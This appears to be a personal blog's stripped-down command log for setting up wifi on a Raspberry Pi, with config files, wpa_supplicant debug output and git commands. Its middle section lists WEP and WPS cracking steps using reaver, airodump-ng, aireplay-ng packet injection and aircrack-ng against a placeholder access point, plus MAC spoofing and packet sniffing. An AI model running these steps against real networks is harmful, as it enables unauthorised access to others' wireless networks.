sudo vi /etc/network/interfaces
auto lo
iface lo inet loopback
iface eth0 inet dhcp
auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
auto lo
iface lo inet loopback
iface eth0 inet dhcp
allow-hotplug wlan0
iface wireless1 inet dhcp
wpa-ssid MYESSID
wpa-psk AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!
sudo ifup wlan0=wireless1
sudo ifup wlan0=wireless1
to their start up scripts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
DE:AD:BE:EF:DE:AD:BE:EF:DE:AD:BE:EF:DE:AD:BE:EF.
Please contact your system administrator.
Add correct host key in /home/user/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/user/.ssh/known_hosts:8
ECDSA host key for 192.168.10.142 has changed and you have requested strict checking.
Host key verification failed.
vi ~/.ssh/config
Host 192.168.10.142
StrictHostKeyChecking no
UserKnownHostsFile=/dev/null
wpa_passphrase MYESSID AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!
network={
ssid="MYESSID"
#psk="AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!"
psk=6c2e62aa8e220a890bafbfbe2aab76e3b600b06a0e451e5b6d49f717461c2d63
}
sudo vi /etc/wpa_supplicant/wpa_supplicant.conf
sudo wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant.conf -iwlan0 -d
sudo dhclient wlan0
sudo wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant.conf -iwlan0 -d
EAPOL: External notification - EAP success=1
EAPOL: SUPP_PAE entering state AUTHENTICATING
EAPOL: SUPP_BE entering state SUCCESS
EAP: EAP entering state DISABLED
EAPOL: SUPP_PAE entering state AUTHENTICATED
EAPOL: Supplicant port status: Authorized
EAPOL: SUPP_BE entering state IDLE
EAPOL authentication completed successfully
sudo dhclient wlan0
returns
RTNETLINK answers: File exists
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
cd reaver-wps-read-only/src
./configure
make
sudo make install
sudo /etc/init.d/ifplugd stop
sudo killall ifplugd
sudo airmon-ng start wlan0
sudo reaver -i mon0 -b 00:00:DE:AD:BE:EF -A
[+] Nothing done, nothing to save.
sudo wash -i mon0 -C -s
sudo apt-get install libssl-dev subversion iw
svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng
make
sudo make install
sudo airodump-ng-oui-update
sudo airmon-ng start wlan0
sudo airodump-ng -c 6 --w wep --bssid 00:00:DE:AD:BE:EF mon0
sudo airmon-ng stop wlan0
sudo airmon-ng stop mon0
sudo /etc/init.d/ifplugd stop
sudo killall ifplugd
sudo airmon-ng start wlan0
sudo airodump-ng -c 6 --w wep --bssid 00:00:DE:AD:BE:EF mon0
sudo aireplay-ng -1 900 -o 1 -q 10 -a 00:00:DE:AD:BE:EF -h DE:AD:BE:EF:00:00 mon0
sudo airmon-ng start wlan0 6
sudo aireplay-ng -3 -b 00:00:DE:AD:BE:EF -h DE:AD:BE:EF:00:00 mon0
sudo airmon-ng stop mon0
ls -larth
aircrack-ng wep-01.cap
sudo iwconfig wlan0 essid MYESSID key THEWEPHEXKEY
dhclient wlan0
sudo tcpdump -A -i wlan0
ifconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
SIOCSIFHWADDR: Device or resource busy - you may need to down the interface
sudo service ifplugd stop
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether 01:02:03:04:05:06
SIOCSIFHWADDR: Cannot assign requested address
ifconfig
sudo service ifplugd start
ifconfig
sudo apt-get install screen gpsd ncurses-dev libpcap-dev tcpdump
wget http://www.kismetwireless.net/code/kismet-2011-03-R2.tar.gz
tar xfvz kismet-2011-03-R2.tar.gz
cd kismet-2011-03-R2
./configure
make
sudo make install
sudo kismet
sudo vi /etc/network/interfaces
dd
i
auto lo
iface lo inet loopback
iface eth0 inet dhcp
auto wlan0
iface wlan0 inet dhcp
wireless-essid UR_ESSID!!!!!
wireless-key UR_KEY!!!!!
wireless-mode managed
#allow-hotplug wlan0
#iface wlan0 inet manual
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
x
a
x
a
:wq
sudo shutdown -r now
ps auwx
uname -a
Linux raspberrypi 3.6.11+ #427 PREEMPT Fri Apr 26 20:53:06 BST 2013 armv6l GNU/Linux
lsusb | grep -i wireless
Bus 001 Device 005: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
ifconfig
iwconfig
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
eth0 no wireless extensions.
sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
iwconfig
shows the ESSID correctly, but running
sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
sudo killall wpa_cli
sudo killall wpa_supplicant
sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
sudo dhclient wlan0
git clone https://github.com/MYGITUSERNAME/NAMEOFTHEPROJECT.git
git config --global user.email "YOUREMAILADDRESS@USEDWITHGITHUB"
git config --global user.name "MYGITUSERNAME"
git commit FILETOCOMMIT
git push origin master
git clone https://github.com/MYGITUSERNAME/NAMEOFTHEPROJECT.git
git config --global user.email "YOUREMAILADDRESS@USEDWITHGITHUB"
git config --global user.name "MYGITUSERNAME"
git commit FILETOCOMMIT
git push origin master
email
root
flog archives
In fact I'm not responsible for anything ever, so there!
Disclaimer:
This page is by me for me, if you are not me then please be aware of the following
I am not responsible for anything that works or does not work including files and pages made available at www.jumpstation.co.uk
I am also not responsible for any information(or what you or others do with it) available at www.jumpstation.co.uk